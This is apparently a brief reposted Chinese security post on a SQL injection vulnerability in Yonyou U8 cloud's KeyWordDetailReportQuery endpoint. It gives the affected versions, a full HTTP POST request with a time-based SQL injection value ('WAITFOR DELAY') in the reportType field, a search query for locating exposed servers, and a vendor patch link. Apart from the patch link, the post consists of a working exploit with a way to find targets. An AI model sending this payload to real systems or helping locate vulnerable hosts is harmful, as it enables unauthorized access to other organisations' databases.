U8 cloud 2.1,2.3,2.5,2.6,2.65,2.7,3.0,3.1,3.2,3.5,3.6,3.6sp,5.0,5.0sp
payload
POST /servlet/~iufo/nc.itf.iufo.mobilereport.data.KeyWordDetailReportQuery HTTP/1.1
{"reportType":"';WAITFOR DELAY '0:0:5'--","usercode":"18701014496","keyword":[{"keywordPk":"1","keywordValue":"1","keywordIndex":1}]}
app:"用友-U8-Cloud"
https://security.yonyou.com/#/patchInfo?identifier=f3fd4862ca2f45b3803ac48df08ace98
原文始发于微信公众号(棉花糖网络安全圈):(1day)用友U8 cloud KeyWordDetailReportQuery SQL注入漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论